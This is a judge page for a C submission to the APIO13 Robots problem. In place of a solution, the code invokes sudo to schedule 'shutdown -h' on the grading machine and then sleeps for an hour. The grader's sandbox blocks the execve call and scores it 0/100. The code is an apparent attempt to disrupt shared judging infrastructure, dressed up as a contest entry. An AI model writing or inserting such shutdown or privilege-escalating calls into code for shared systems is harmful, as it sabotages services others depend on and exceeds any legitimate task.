Submission #7638

# Submission time Handle Problem Language Result Execution time Memory
7638 2014-08-13T09:56:55 Z aaaa Robots (APIO13_robots) C
0 / 100
0 ms 1080 KB
#include<stdio.h>
#define SUDO "/usr/bin/sudo"
int main(void)
{
char *arg0;//this should be actual command itself
char *arg1,*arg2,*arg3,*arg4;
arg0 = "sudo";
arg1 = "shutdown";
arg2 = "-h";
arg3 = "01:30";
arg4 = (char *)NULL;
execl(SUDO,arg0,arg1,arg2,arg3,arg4);
sleep(60*60);
return 0;
}
# Verdict Execution time Memory Grader output
1 Runtime error 0 ms 1080 KB execve (syscall #59) was called by the program (disallowed syscall)
2 Halted 0 ms 0 KB -
# Verdict Execution time Memory Grader output
1 Halted 0 ms 0 KB -
# Verdict Execution time Memory Grader output
1 Halted 0 ms 0 KB -
# Verdict Execution time Memory Grader output
1 Halted 0 ms 0 KB -